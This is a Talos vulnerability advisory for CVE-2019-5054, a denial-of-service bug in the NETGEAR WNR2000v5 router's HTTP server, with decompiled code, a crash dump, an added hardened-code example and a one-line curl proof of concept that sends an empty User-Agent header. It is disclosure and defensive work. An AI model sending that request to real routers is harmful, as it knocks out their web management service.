Talos Vulnerability Report

TALOS-2019-0831

NETGEAR N300 WNR2000v5 unauthenticated HTTP denial-of-service vulnerability

September 9, 2019
CVE Number

CVE-2019-5054

Summary

An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.

Tested Versions

NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70

Product URLs

https://www.netgear.com/support/product/WNR2000v5

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-730: Denial of Service

Details

The NETGEAR N300 is a small, affordable wireless router with minimal features.

Each HTTP request made to the HTTP daemon populates the following structure located at the hard-coded address 0x4cabb0:

struct http_request {
  char method[8];
  float version;
  char url[256];
  char headerbuf[4096];
  char *authorization;
  char *host;
  char *accept;
  char *accept_charset;
  char *accept_encoding;
  char *accept_language;
  char *connection;
  char *cookie;
  char *referer;
  char *user_agent;
  char *content_type;
  char *content_length;
  char *soapaction;
};

When a client attempts to access a page that requires authentication, the function doauthcheck() calls another function, sendauthenticate(). This function contains a section of code that concatenates the received User-Agent to the end of the client IP address (after the address is converted to a string). The resulting string is then supposed to be compared against the contents of the file "/tmp/AUTHlogin_browser", which should contain the IP address and User-Agent of the previously authenticated client.

The problem is that there is no check for the case where req->user_agent is not populated (the client sent an empty User-Agent header). strcat() then reads from a NULL pointer, which crashes the service:

agent = sa_straddr(&peeraddr);      // Convert binary IP address to a string at 0x4b1c98
strcpy(curBrowser, agent);          // Copy the IP address string
strcat(curBrowser, req->user_agent); // Append req->user_agent (NULL when the header is empty) to the IP address

[Annotated Disassembly / Decompilation output]

0x4097f8 <send_authenticate+412>:   lw      a1,4400(s5)   // a1 = req->user_agent (offset 4400 in the structure above)
0x4097fc <send_authenticate+416>:   lw      t9,-31484(gp) // load address of strcat()
0x409800 <send_authenticate+420>:   jalr    t9            // crash @ call strcat(curBrowser, req->user_agent)
0x409804 <send_authenticate+424>:   move    a0,s0         // a0 = client IP address string (branch delay slot, executed before the call)
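The following is an added example, not code from the advisory or from the NETGEAR firmware, showing how the IP + User-Agent concatenation in sendauthenticate() could be written so that a missing header cannot crash the daemon. The struct and the function name build_browser_id are hypothetical stand-ins; the fix treats a NULL user_agent as an empty string and replaces the unbounded strcpy()/strcat() pair with a length-checked snprintf().

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Trimmed, hypothetical stand-in for the daemon's request structure:
 * only the field involved in this bug is kept. */
struct http_request {
    char *user_agent;   /* NULL when the client sends an empty User-Agent header */
};

#define BROWSER_ID_LEN 512  /* assumed size of the curBrowser buffer */

/* Hardened replacement for:
 *     strcpy(curBrowser, agent);
 *     strcat(curBrowser, req->user_agent);
 * Returns 0 on success and -1 on a missing argument or when the
 * result would not fit in the caller's buffer (out is then emptied). */
int build_browser_id(char *out, size_t outlen, const char *client_ip,
                     const struct http_request *req)
{
    if (out == NULL || outlen == 0 || client_ip == NULL)
        return -1;

    /* The original code passes req->user_agent to strcat() unconditionally;
     * a NULL here is exactly the SIGSEGV in the advisory. Treat a missing
     * header as the empty string instead. */
    const char *ua = (req != NULL && req->user_agent != NULL) ? req->user_agent : "";

    int n = snprintf(out, outlen, "%s%s", client_ip, ua);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';   /* truncated: do not hand a partial identity to the comparison */
        return -1;
    }
    return 0;
}

int main(void)
{
    char cur_browser[BROWSER_ID_LEN];
    struct http_request req = { NULL };   /* constructed: empty User-Agent header */

    if (build_browser_id(cur_browser, sizeof cur_browser, "192.168.1.2", &req) == 0)
        printf("browser id: \"%s\"\n", cur_browser);   /* prints just the IP address */

    req.user_agent = "curl/7.64.1";       /* constructed: normal request */
    if (build_browser_id(cur_browser, sizeof cur_browser, "192.168.1.2", &req) == 0)
        printf("browser id: \"%s\"\n", cur_browser);
    return 0;
}
```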

Crash Information

   0x2ab59f88:  bnez    v0,0x2ab59f84
   0x2ab59f8c:  addiu   v1,v1,1
   0x2ab59f90:  addiu   v1,v1,-2
=> 0x2ab59f94:  lb  v0,0(a1)        // $a1 == 0x00
   0x2ab59f98:  addiu   v1,v1,1
   0x2ab59f9c:  addiu   a1,a1,1
   0x2ab59fa0:  bnez    v0,0x2ab59f94
   0x2ab59fa4:  sb  v0,0(v1)

Stopped reason: SIGSEGV
0x2ab59f94 in ?? ()

peda-mips > x/32xw $a1
0x0:    Cannot access memory at address 0x0

Exploit Proof of Concept

$ curl -H 'User-Agent:' http://192.168.1.1/UPG_upgrade.htm

Timeline

2019-05-08 - Vendor Disclosure
2019-09-09 - Public Release

Credit

Discovered by Dave McDaniel of Cisco Talos.